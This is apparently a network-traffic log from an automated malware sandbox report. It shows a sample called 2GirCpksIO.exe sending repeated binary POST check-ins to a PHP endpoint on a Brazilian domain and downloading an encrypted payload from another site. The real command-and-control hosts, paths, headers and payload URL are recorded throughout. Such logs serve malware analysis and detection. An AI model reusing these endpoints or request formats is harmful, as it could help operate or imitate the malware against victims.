                                Nov 22, 2021 15:29:59.178734064 CET | 390 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:58 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                59 | 192.168.11.20 | 49846 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:59.689049006 CET | 391 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:59.975543022 CET | 391 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:59 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                6 | 192.168.11.20 | 49793 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:11.736716986 CET | 323 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:12.041415930 CET | 324 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:11 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                60 | 192.168.11.20 | 49847 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:00.511900902 CET | 392 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:00.827406883 CET | 392 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:00 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                61 | 192.168.11.20 | 49848 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:01.346014023 CET | 393 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:01.728337049 CET | 394 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:01 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                62 | 192.168.11.20 | 49849 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:02.238846064 CET | 394 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:02.601727009 CET | 395 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:02 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                63 | 192.168.11.20 | 49850 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:03.116560936 CET | 396 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:03.426031113 CET | 396 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                64 | 192.168.11.20 | 49851 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:03.916595936 CET | 397 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:04.288131952 CET | 398 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:03 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                65 | 192.168.11.20 | 49852 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:04.808484077 CET | 398 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:05.104880095 CET | 399 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:04 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                66 | 192.168.11.20 | 49853 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:05.541893959 CET | 399 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:05.856829882 CET | 400 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:05 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                67 | 192.168.11.20 | 49854 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:06.386045933 CET | 401 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:06.707102060 CET | 401 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:06 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                68 | 192.168.11.20 | 49855 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:07.236643076 CET | 402 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:07.590959072 CET | 403 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                69 | 192.168.11.20 | 49856 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:08.022269964 CET | 403 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:08.373509884 CET | 404 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                7 | 192.168.11.20 | 49794 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:12.785936117 CET | 324 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:13.082870007 CET | 325 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:12 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                70 | 192.168.11.20 | 49857 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:08.881208897 CET | 404 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:09.182101011 CET | 405 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                71 | 192.168.11.20 | 49858 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:09.697526932 CET | 406 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:10.017735958 CET | 406 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                72 | 192.168.11.20 | 49859 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:10.553688049 CET | 407 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:10.889452934 CET | 407 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:10 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                73 | 192.168.11.20 | 49860 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:11.411926031 CET | 408 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:11.751856089 CET | 409 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:11 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                74 | 192.168.11.20 | 49861 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:12.278911114 CET | 409 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:12.583456993 CET | 410 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:12 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                75 | 192.168.11.20 | 49862 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:30:13.115180969 CET | 411 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:30:13.441615105 CET | 411 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:30:13 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                76 | 192.168.11.20 | 49863 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                77 | 192.168.11.20 | 49864 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                78 | 192.168.11.20 | 49865 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                79 | 192.168.11.20 | 49866 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                8 | 192.168.11.20 | 49795 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:13.775517941 CET | 326 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:14.092895031 CET | 326 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:13 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                80 | 192.168.11.20 | 49867 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                81 | 192.168.11.20 | 49868 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                82 | 192.168.11.20 | 49869 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                83 | 192.168.11.20 | 49870 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                84 | 192.168.11.20 | 49871 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                85 | 192.168.11.20 | 49872 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                86 | 192.168.11.20 | 49873 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                87 | 192.168.11.20 | 49874 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                88 | 192.168.11.20 | 49875 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                89 | 192.168.11.20 | 49876 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                9 | 192.168.11.20 | 49796 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:14.715713978 CET | 327 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:15.013587952 CET | 327 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:14 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                90 | 192.168.11.20 | 49877 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                91 | 192.168.11.20 | 49878 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                92 | 192.168.11.20 | 49879 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                93 | 192.168.11.20 | 49880 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                94 | 192.168.11.20 | 49881 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                95 | 192.168.11.20 | 49882 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                96 | 192.168.11.20 | 49883 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                97 | 192.168.11.20 | 49884 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                98 | 192.168.11.20 | 49885 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                99 | 192.168.11.20 | 49886 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                HTTPS Proxied Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.11.20 | 49787 | 68.66.226.70 | 443 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                2021-11-22 14:28:58 UTC | 0 | OUT | GET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: afrocompass.com
                                Cache-Control: no-cache
                                2021-11-22 14:28:58 UTC | 0 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:28:58 GMT
                                Server: Apache
                                Strict-Transport-Security: max-age=63072000; includeSubDomains
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Last-Modified: Mon, 22 Nov 2021 06:16:05 GMT
                                Accept-Ranges: bytes
                                Content-Length: 106560
                                Connection: close
                                Content-Type: application/octet-stream
                                Data Ascii: hl={Q\O4>Agh-/JwYuBc@^hKI^!yLq1yD7_WM2TvcJZw.[2)t]u EzE,JRh75~8Y]Ldp|vGhXWig?sVX!U4g
                                2021-11-22 14:28:59 UTC86INData Raw: 53 e7 e4 15 1b 39 18 e4 11 41 b1 eb a4 e6 ca 41 48 6b 9c 00 2e 95 3e 56 0f 3a a0 f2 b9 e9 fd 0c e9 ec ad 26 48 7c e0 03 42 f9 e9 db 6b 13 9e 4f 3a 7e 0a 37 7e e7 c5 59 81 49 21 7d 75 06 cb 06 d7 a7 e2 1e 72 2b c4 0b 97 58 75 08 0b 84 33 60 68 c9 b7 8f db 88 07 f4 d6 8b 67 a4 e8 e8 6d ec d1 e4 2b 67 60 9c e0 23 2f 5f 03 5d 12 07 7e 62 b3 d9 b1 de 98 3f 40 95 83 74 d8 ca e8 65 ef d5 5e 15 34 f9 0e ca 80 f0 5f c6 a1 ab 0c 46 a4 76 0f 0f 8e 9e bd 70 15 9c 96 59 c2 d4 36 33 e5 ee b1 15 44 8c 06 ee e2 62 82 07 0b 1f 09 c6 66 d2 01 dc b1 a4 90 3c b2 e7 f8 d4 4a 4f a3 8e 0a 29 08 c9 56 64 c6 b5 7c 7a 43 9a 8a 72 f7 d9 1c 86 f7 ed 65 ad e8 2a 85 5c 9b 10 05 5d 82 1f 54 ec 85 23 9a af 2f 79 ad 8b 97 ab 71 1b f7 d4 4e 97 81 d0 9d 2c 70 60 6d d2 1f 2a 67 bf 75 9d 9f
                                Data Ascii: S9AAHk.>V:&H|BkO:~7~YI!}ur+Xu3`hgm+g`#/_]~b?@te^4_FvpY63Dbf<JO)Vd|zCre*\]T#/yqN,p`m*gu
